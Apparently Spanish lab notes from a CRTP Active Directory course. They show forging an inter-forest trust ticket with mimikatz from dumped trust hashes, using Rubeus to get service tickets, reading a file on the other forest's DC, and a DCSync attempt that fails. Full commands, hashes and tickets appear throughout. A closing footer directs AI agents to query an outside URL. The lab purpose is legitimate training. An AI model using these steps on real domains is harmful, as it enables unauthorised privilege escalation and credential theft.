# Learning Objective - 20 ## Across Forest using Trust Tickets Requerimos el hash de la confianza entre forest. ``` SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e::: SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6::: SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a::: ``` Creando un TGT entre forest. ``` C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi User : Administrator Domain : dollarcorp.moneycorp.local (DOLLARCORP) SID : S-1-5-21-719815819-3726368948-3917688648 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: 4501e4c7f30e1cb3c9886f06a3ed1c6a - rc4_hmac_nt Service : krbtgt Target : eurocorp.local Lifetime : 3/4/2024 2:30:48 AM ; 3/2/2034 2:30:48 AM ; 3/2/2034 2:30:48 AM -> Ticket : trust_forest_tkt.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz(commandline) # exit Bye! ``` Luego cargamos el ticket usando rubeus. ``` C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGS [*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local' [*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1) [+] TGS request successful! [+] Ticket successfully imported! [*] base64(ticket.kirbi): doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC AQqiggQIBIIEBAgZKzPmmUITcuwUbfM/uLcsByEwg/dMg8Y0vkQZux0opKlDvj08pvby44Q4Th16IKXZ 1xFXwcpgrSdps3RU498Y4bVonA3EswaEbAqFeofHr/8y7xQN/XmWHkVrAtiFPswkTLo653JwinVCKPso cKJCS0GllF0jWj35vM+S3z1XJQf2ZtHcCa5FepYdSj/Xa5nGYikyhOrhCvWBMCaZ5GWlqEPURS7UUmKC COaKC7eFq92gcKsGKfYk5BawabmrCpBZP+5h0PK1qmK0BeQkLIo2z9ajPMFi0ec7onCm/IyVh252I9P/ wh4GmJKcMyDoXZ4q11gVBVjKcttXbaGeYXNOwbUC4j7ucRb6F4oKabveqtoXkgDKSR4OwUhcAUCR11ir jKn4rqhciYvkzcphaWyv8lpTbp2gmqGL4doURnmEYOL/djR/gXiWdgOdeeTH4j8N2RKY+c7N8wA9bFKd mfN+WSfrNl+DBv8RTsr4sBlzkYDQhpcW2q6805pvR+1strtDPm6kM6xyIGeyvULp2FzsM9LX2Mj1sVtO 6Xz6SFUUxD/w4tZX7Ra43A0ESWJ+Eh9yAGRuAOCrXeh+5lFeYTsJXzd1BBMT73zUZ+tm9b8Rz7VXD65q inFpJ9qTUzE48yq8c0gbYx6Nhy8Fg3bn6mezPFxS+t5pdACRA2l49/xlpaLlKpj8Mz+/myMT0533dGBo pLNF6IkSg4NhptEcZwZJo7QVJK6+E66ZgcBX5BNHYjCeVnh+O2oAQycrbbhuOYHo/RUxhbXVPCKaB/Gn pbsvImS3lbWxxI2KEhpWPtKihGZdpG3rU8q33nRpYRcQm+31kvInTRw1RrbT2m4SZb3oea7VGuOeTPBG mgGfyeOQFMO0Jkuivaubk6sc8rCz9XHBFmgVwzw5RNp8K/YmqHlkKNHUrPhYmaWFNzKJLkZcoksxEsBv 8axwax7sxRTtTVX1FzoSQzJaFqu49D0ebq9c7Vqpk5KJip1Ti0YJ1FU57PSHQ30P7P5y7bIBqLDmmASm 7TGC69ehiDutDllQb71684+ucr7ly8qL62EmyBMYEz5Je+cen0dwPjOFDTvnlAlhBHQNAI/hlo3wNuTY O22D8Jl0hKFPdBF2BK1Sg+CUgY3Qhoy8NDW0yAuG2D34gvHihbBp//ctps7P+BaBtShVIMwovvnSBU25 CoEQTy5ZOaTvWLlSAApT7gbU9IoS4+kl0k+y9lj+r6HHm/4W3YH0y+8emhkUajnRjQ8xuGmX5DPPwCoi 662DKgrGoU16Tcnviziois6d76DXuCD8VCJFcwJhopk+Dzr3NiBj+WgBYkVoXBguFjCPPBZIB3T8rKCO WGpK8BiPI29JIzz5uRVf1gcNo4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB EqEiBCCg2U90iALbhrC3P4FVBfXDOqB19ReLUqWmj/g5TO+F36EcGxpkb2xsYXJjb3JwLm1vbmV5Y29y cC5sb2NhbKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDAzMDQxMDMw NTlaphEYDzIwMjQwMzA0MjAzMDU5WqcRGA8yMDI0MDMxMTEwMzA1OVqoEBsORVVST0NPUlAuTE9DQUyp LTAroAMCAQKhJDAiGwRjaWZzGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA== ServiceName : cifs/eurocorp-dc.eurocorp.local ServiceRealm : EUROCORP.LOCAL UserName : Administrator UserRealm : dollarcorp.moneycorp.local StartTime : 3/4/2024 2:30:59 AM EndTime : 3/4/2024 12:30:59 PM RenewTill : 3/11/2024 3:30:59 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : oNlPdIgC24awtz+BVQX1wzqgdfUXi1Klpo/4OUzvhd8= ``` Ahora podemos consultar al dc de eurocorp leer los archivos y obtener el contenido de secret.txt ``` C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\ Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label. Volume Serial Number is 1A5A-FDE2 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp 11/16/2022 04:26 AM . 11/15/2022 06:17 AM 29 secret.txt 1 File(s) 29 bytes 1 Dir(s) 12,755,787,776 bytes free C:\AD\Tools>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt Dollarcorp DAs can read this! C:\AD\Tools> ``` ## DCSync Si quisieramos hacer DCSync, probamos con el protocolo LDAP al cargar el ticket. ``` C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:ldap/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGS [*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket [*] Building TGS-REQ request for: 'ldap/eurocorp-dc.eurocorp.local' [*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1) [+] TGS request successful! [+] Ticket successfully imported! [*] base64(ticket.kirbi): doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w K6ADAgECoSQwIhsEbGRhcBsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMC AQqiggQIBIIEBI9+WG8cz1LDuX8Dk9+tlOaTLDPbon/rmZj+Gh3OEwsdMfTkmuE1N8v7avq3Wja+NLEk Jfr6ZwMQbTVqPxyL4EuEhS44ga8Ni3K7BxUp1JYfvwPvvoB7OR6vOVXRO04m2JRcthfz4sEzvMQH3PnG zU12MQ+R6zGAjd8/urJj0Ip1F0Y9+P83NuLSY72y+ISGkadwmxoYC9AhocgyyJWp/w8b90vKnDhgC2bJ zlLM4m5Fy69m3vgAG0hBXuo5ArhN4MQvihP9wteiIFtT47dsl4jf6b/Eo5meh37defKVC20pyr7DsLVl PJBuyuvFPJWeK/ZIMJHYSczokdtHLnL0e+fkySHSzQqmDaFhaGPdqtLqp3jv1RP2k6bcGTO79JOmqB/q RqggAqUP2Rt2VML1w94mDZLCWZaCwnLifsurw8e8FNotFBdpZBPHCfhtzoXRjNt7i1bn/nJKbMTU+DAI bT42cT9MGVX+5MQQ+VtRJbXf9FMSRJnfmwl7JTxnS2qnMpsxGQE7o5RK50K/99tOuLSead866DjUTUXq OIRgPVDdPyvZ+6HK6Xsgg9mPD5sfnZ/HOpcCdwQuJa1UVAQk93NqjCSP+TwKF5EjqWpBVCvpYyGHPlQU jAFg7Gi1lc2qMOdWvEzGUMOmo4gyE0soO9PZxDSQ/merbStvd3T2PqtcdVVrch0vihvh6lm+ea90ZtM1 J7b3RGuhtpUUgrpRPA7/hwIcvuvg1N2wpRHeyW8Lwz307NMNJkHky+IVdc/5qZowhSEbIEIDbmv8oOqg uLBA5ObrJz5tL1nS6+eSDo04XIJf3Yu73s7vXWTsZNvYdc8gFj/reahweFw1Gp2kxfdM5vCGAPmwuOAb FpLfeRyRpPy6xagX8y6KNBQZpeAGfYl8ubwTlPGIhBx48BomBW0mpEWJsQjp6Ch9sBjtwcyzDjH7oUxC ZwLg4WduCj06uRaZN08w/Stw0SrxRiyNXc1vMY8ulIZ6VhenNcA4U23RrES2n6KJ7vCOeI2sgepZIq3j 5PvDXEid0i5jqZVMCuZTwoIczpLkmdb8jAg7wZtbsp7NNU7cWzyN4dyVYt1VARjNwbt7DyTB5vIi+apn DL/2Dx7jgT0qDQjWkq7A+/Kl3DitdgoAhZAVfuIyOjd38l2eGwqDB+F6OD/sOSICWRW9lCa1MOhiAX94 S0qksn+2w/7FOXUsNd/zly6txwq5+hfrShdPyLQNEkMP2855P+Hq0bEXq42ErbEApZrz3D0WdtLUsdcr N4myuI7jJj1ri6wQCmqW+txcLXtjHd05BmxgEjn9A+sSlchAehgDI56WdqjiXiRiLp1YnSmOe/J+wmxz /l5PkiIi+OBnJNh7r5JPf+W7o4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIB EqEiBCDtFchaQ8cyWXbOz3e/8VJ8myX+ft8Yd5NVvzV0vyITL6EcGxpkb2xsYXJjb3JwLm1vbmV5Y29y cC5sb2NhbKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDAzMDQxMDM3 MjhaphEYDzIwMjQwMzA0MjAzNzI4WqcRGA8yMDI0MDMxMTEwMzcyOFqoEBsORVVST0NPUlAuTE9DQUyp LTAroAMCAQKhJDAiGwRsZGFwGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA== ServiceName : ldap/eurocorp-dc.eurocorp.local ServiceRealm : EUROCORP.LOCAL UserName : Administrator UserRealm : dollarcorp.moneycorp.local StartTime : 3/4/2024 2:37:28 AM EndTime : 3/4/2024 12:37:28 PM RenewTill : 3/11/2024 3:37:28 AM Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : 7RXIWkPHMll2zs93v/FSfJsl/n7fGHeTVb81dL8iEy8= ``` No funciona y no se porque exactamente, debe estar limitado a ciertas consultas. ``` C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local" "exit" .#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(commandline) # lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local [DC] 'eurocorp.local' will be the domain [DC] 'eurocorp-dc.eurocorp.local' will be the DC server [DC] 'ecorp\Administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439) mimikatz(commandline) # exit Bye! C:\AD\Tools> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-20.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.